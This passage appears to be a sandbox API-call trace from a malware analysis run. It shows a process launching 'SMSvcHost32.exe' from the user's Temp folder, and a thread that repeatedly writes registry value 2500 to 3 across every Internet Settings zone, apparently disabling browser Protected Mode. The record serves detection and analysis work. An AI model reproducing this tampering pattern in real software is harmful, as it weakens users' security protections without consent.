	[0140.086] FindNextFileW (in: hFindFile=0x396ca58, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0
	[0140.086] FindClose (in: hFindFile=0x396ca58 | out: hFindFile=0x396ca58) returned 1

Thread:
	id = 105
	os_tid = 0xdb4

	[0088.125] OpenProcess (dwDesiredAccess=0x100400, bInheritHandle=0, dwProcessId=0x934) returned 0x1ec
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.125] GetLastError () returned 0x57
	[0088.126] GetLastError () returned 0x57
	[0088.126] StrCpyW (in: psz1=0x69f060, psz2="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" | out: psz1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe"
	[0088.126] StrCatW (in: psz1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", psz2=" --vwxyz" | out: psz1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz") returned="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz"
	[0088.126] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x9000008, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x262fc94*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x262ff20 | out: lpCommandLine="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz", lpProcessInformation=0x262ff20*(hProcess=0x240, hThread=0x20c, dwProcessId=0xdd4, dwThreadId=0x574)) returned 1
	[0088.135] CloseHandle (hObject=0x20c) returned 1
	[0088.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0x0
	[0088.135] WaitForMultipleObjects (nCount=0x2, lpHandles=0x262ff4c*=0x240, bWaitAll=0, dwMilliseconds=0xffffffff) 

Thread:
	id = 106
	os_tid = 0xdc0

	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.135] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.136] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] GetLastError () returned 0x57
	[0088.137] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0088.137] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0088.138] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0088.138] RegCloseKey (hKey=0x20c) returned 0x0
	[0088.138] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0088.138] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0088.138] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0088.138] RegCloseKey (hKey=0x20c) returned 0x0
	[0088.138] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0088.138] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0088.138] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0088.138] RegCloseKey (hKey=0x20c) returned 0x0
	[0088.138] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0088.138] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0088.138] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0088.138] RegCloseKey (hKey=0x20c) returned 0x0
	[0088.138] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0088.138] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0088.138] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0088.139] RegCloseKey (hKey=0x20c) returned 0x0
	[0088.139] Sleep (dwMilliseconds=0x3e8) 
	[0089.189] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0089.189] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0089.189] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0089.190] RegCloseKey (hKey=0x20c) returned 0x0
	[0089.190] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0089.190] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0089.190] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0089.190] RegCloseKey (hKey=0x20c) returned 0x0
	[0089.190] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0089.190] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0089.190] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0089.190] RegCloseKey (hKey=0x20c) returned 0x0
	[0089.190] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0089.190] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0089.190] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0089.190] RegCloseKey (hKey=0x20c) returned 0x0
	[0089.190] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0089.190] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0089.190] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0089.190] RegCloseKey (hKey=0x20c) returned 0x0
	[0089.191] Sleep (dwMilliseconds=0x3e8) 
	[0090.256] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0090.256] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0090.257] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0090.257] RegCloseKey (hKey=0x20c) returned 0x0
	[0090.257] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0090.257] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0090.257] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0090.257] RegCloseKey (hKey=0x20c) returned 0x0
	[0090.257] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0090.257] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0090.257] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0090.257] RegCloseKey (hKey=0x20c) returned 0x0
	[0090.257] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0090.257] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0090.258] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0090.258] RegCloseKey (hKey=0x20c) returned 0x0
	[0090.258] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0090.258] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0090.258] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0090.258] RegCloseKey (hKey=0x20c) returned 0x0
	[0090.258] Sleep (dwMilliseconds=0x3e8) 
	[0091.304] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0091.304] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0091.305] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0091.305] RegCloseKey (hKey=0x20c) returned 0x0
	[0091.305] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0091.305] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0091.305] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0091.305] RegCloseKey (hKey=0x20c) returned 0x0
	[0091.305] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0091.305] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0091.305] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0091.305] RegCloseKey (hKey=0x20c) returned 0x0
	[0091.305] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0091.305] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0091.305] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0091.305] RegCloseKey (hKey=0x20c) returned 0x0
	[0091.305] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0091.305] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0091.306] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0091.306] RegCloseKey (hKey=0x20c) returned 0x0
	[0091.306] Sleep (dwMilliseconds=0x3e8) 
	[0092.357] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0092.357] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0092.357] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0092.357] RegCloseKey (hKey=0x20c) returned 0x0
	[0092.358] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0092.358] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0092.358] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0092.358] RegCloseKey (hKey=0x20c) returned 0x0
	[0092.358] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0092.358] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0092.358] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0092.358] RegCloseKey (hKey=0x20c) returned 0x0
	[0092.358] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0092.358] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0092.358] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0092.358] RegCloseKey (hKey=0x20c) returned 0x0
	[0092.358] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0092.358] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x20c) returned 0x0
	[0092.358] RegSetValueExA (in: hKey=0x20c, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0092.358] RegCloseKey (hKey=0x20c) returned 0x0
	[0092.358] Sleep (dwMilliseconds=0x3e8) 
